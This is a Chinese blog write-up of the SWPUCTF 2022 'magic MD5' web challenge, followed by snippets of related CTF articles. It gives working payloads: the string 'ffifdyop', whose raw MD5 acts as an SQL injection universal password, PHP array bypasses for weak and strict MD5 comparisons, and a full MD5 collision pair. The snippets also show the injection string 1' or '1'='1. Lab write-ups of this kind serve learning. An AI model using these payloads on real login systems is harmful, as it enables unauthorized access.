[SWPUCTF 2022 新生赛]奇妙的MD5

最新推荐文章于 2024-05-28 22:06:52 发布
最新推荐文章于 2024-05-28 22:06:52 发布
阅读量738 收藏 8
点赞数 9
分类专栏: ctf 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73612768/article/details/135617798
版权

[SWPUCTF 2022 新生赛]奇妙的MD5 wp

题目页面:

在这里插入图片描述

提示:可曾听过ctf 中一个奇妙的字符串。

奇妙的字符串

奇妙的字符串,又跟 MD5 有关,我只知道两个:

一个是 MD5 加密后弱比较等于自身,这个字符串是 0e215962017 :

在这里插入图片描述

另一个是 MD5 加密后变成万能密码,这个字符串是 ffifdyop :

在这里插入图片描述

使用第二个字符串成功通过。

线索在源码里

通过上一关后,跳转到如下页面:

在这里插入图片描述

查看源代码:

在这里插入图片描述

MD5 弱比较

方法很多,这里用数组绕过,GET 传参:

?x[]=1&y[]=2

MD5 强比较

通过上一关后,跳转到新页面,内容如下:

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['wqh']!==$_POST['dsy']&&md5($_POST['wqh'])===md5($_POST['dsy'])){
    echo $FLAG;
}

使用数组绕过,POST 传参 payload 如下:

wqh[]=1&dsy[]=2

返回结果:

在这里插入图片描述

使用 MD5 碰撞,POST 传参 payload 如下:

wqh=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&dsy=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

建议用 burp 发包,返回结果:

在这里插入图片描述

妙尽璇机
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SWPUCTF 2021 新生]traditional
03-15
SWPUCTF 2021 新生的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
NSS [SWPUCTF 2022 新生]奇妙MD5
Jay17的博客
03-23 603
NSS [SWPUCTF 2022 新生]奇妙MD5
[SWPUCTF 2022 新生]奇妙MD5... ...
最新发布
2401_82985722的博客
05-28 870
第三层:GET传参?第一层:POST传参 gdou[]=1&ctf[]=2,(===强比较,[]数组绕过)字符串的弱比较,可以用114514a(字符串)来绕过,解析后仍为114514(整型)F12查看源码,在/dist/index.umd.js中发现一个关于flag的路径。输入想要获取的数据库名称,使用万能密码1’ or ‘1’=’1爆破。二者值不相等,但MD5加密后相等,===强比较 使用[]绕过。第四层:flag传入空值 flag= ,返回。==弱比较,使用0e、[]数组绕过都可以。
[SWPUCTF 2022 新生]numgame&奇妙MD5
m0_73700261的博客
04-06 758
这里只有以恶搞类nss这个类中有一个函数可以调用就是include(‘hint2.php’)接着f12查看网页源代码发现打不开使用开发者工具看看能不能打开。打开发现是一个js的代码这个地方有一串base64编码的东西。[SWPUCTF 2022 新生]奇妙MD5。输出了hint2.php的内容说明思路对了。这里提示类是nss2所以我们调用nss2。打开是一个永远到不了20的计算界面。发现里边有一个前往网页的标签。可以试验一下看看能不能调用。那么回到刚刚那个题目。
【SWPU NSS新生校外通道】web奇妙MD5、whereami、webdog1__start、ez_ez_php、ez_ez_php(revenge)
weixin_46497491的博客
10-23 1239
【SWPU NSS新生校外通道】web奇妙MD5、whereami、webdog1__start、ez_ez_php、ez_ez_php(revenge)
神奇的MD5算法
06-09 2664
背景介绍 在把重要的数据直接存储到数据库中的时候,可能有一些不法份子通过漏洞来直接访问到我们的数据库,那么就可以轻易而据的盗取到我们的用户名和密码。 在平常生活中,估计我们大多数人都在用同一个邮箱来注册各个网站,一旦某个网站被泄露后,那么我们所有网站的隐私都会被泄露。   以上也在告诉我们,不要把密码明文保存。   定义 Message Digest Algori
ctf逆向解题——re1-附件资源
03-05
ctf逆向解题——re1-附件资源
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
error message_errormessage_
10-04
在IT行业中,错误处理是软件开发中的重要环节,它确保了程序在遇到问题时能够以适当...5. 用户交互:利用DIALOG_MESSAGE向用户展示错误,提升用户体验。 理解并掌握这些知识点对于进行高效、健壮的软件开发至关重要。
关于神奇的MD5算法--21
weixin_30888413的博客
06-10 81
1. MD5的全称是Message-DigestAlgorithm5(信息-摘要算法),它的作用是让大容量信息在用数字签名软件签署私人密匙前被"压缩"成一种 保密的格式(就是把一个任意长度的字节串变换成一定长的大整数)。不管是md2、md4还是md5,它们都需要获得一个随机长度的信息并产生一个128位 的信息摘要。 加密哈希函数将任意长度的二进制字符串映射为固定长度的小型二进制字符串。加...
NSSCTF中的pop、babyupload、cve版本签到、奇妙MD5、easy_html
2401_82388450的博客
05-28 1212
1.学习了php反序列化的pop链2.了解了的绝对路径拼接漏洞3.修改主机位时,当主机位必须以123结尾,如:127.0.0.1修改为127.0.0.1234.关于MD5奇妙的字符串。
CTF——无厘头字符串
无节操
10-18 453
##1 以1开头的10位数字(0 <= 数字 <= 9) 思路1:10位长时间戳 ## 2 8/9位数字(0 <= 数字 <= 9) 思路1:9位,以十进制转IP;8位,以十六进制转IP
ffifdyop——绕过中一个奇妙的字符串
PromisingQ
10-02 1112
根据师傅们的博客总结如下: ffifdyop 经过md5加密后:276f722736c95d99e921722cf9ed621c 再转换为字符串:'or'6<乱码>  即  'or'66�]��!r,��b   用途: select * from admin where password=''or'6<乱码>' ...
实验吧奇怪的字符串
Gunther的博客
07-31 2050
http://www.shiyanbar.com/ctf/1877 奇怪的字符串: 信息保密的需求和实际操作自古有之,与之相应的信息加密与解密也是历史悠久,现有一段经过古典密码理论(不止一种)加密的密文,内容如下:  89 51 82 109 89 50 86 122 97 71 107 61  请找出这段密文隐藏的消息明文 解: 古典密码编码方法归根结底主要有两种,即置换和代换。
从0到1的CTF之旅————Misc(1)
qq_44373268的博客
06-07 676
今天来做一下Misc的题目,misc我认为是对新手比较友好的了,因为重点都在思路和工具的使用上面,多做题,多整理,你就可以根据经验总结出一套适用于自己的万能解题法 ————————————————————————————————————————————第一题:签到复制粘贴即可。————————————————————————————————————————————第二题:金三胖(题目如下) 是一张gif图片,但是闪动时会露出红色的图片,看到这里毫无疑问,采用stegsolve工具分解帧。 即为flag{
[SWPUCTF 2022 新生] 刷题记录
rev1ve的博客
08-12 781
SWPUCTF 2022 新生 若调用类中的静态方法,则需要传递一个数组作为第一个参数。数组的第一个元素是类名,第二个元素是要调用的静态方法名。F12,web开发者都被办了,尝试查看源代码,得到。跟第二关相比变成了强等于,直接数组绕过。打开题目,发现加到19就会变成-20。很明显是使用sql注入中的万能密码。一看就是base64加密,直接解码。打开题目,第一关提示在http头。分析一下,提示POST传参,出现。分析一下,进行反序列化时,会让。然后执行函数,且参数值为。绕过后,得到第三关源代码。
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 3768
SWPUCTF 2022新生
[SWPUCTF 2021 新生]hardrce
07-25
\[SWPUCTF 2021 新生\]hardrce是一个比中的题目,它是一个PHP脚本。这个脚本首先会检查用户传入的参数wllm是否存在,然后会对wllm进行一系列的过滤操作。过滤操作包括去除空格、制表符、回车、换行等特殊字符,以及一些特定的符号。如果wllm中包含了这些被过滤的字符,脚本会输出"LTLT说不能用这些奇奇怪怪的符号哦!"。接着,脚本会检查wllm中是否包含字母,如果包含字母,脚本会输出"Ra's Al Ghul说不能用字母哦!"。最后,如果wllm通过了所有的过滤条件,脚本会执行eval函数来执行用户传入的代码。所以,要获取flag,需要构造一个满足所有过滤条件的有效代码。 #### 引用[.reference_title] - *1* *2* *3* [[SWPUCTF 2021 新生] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值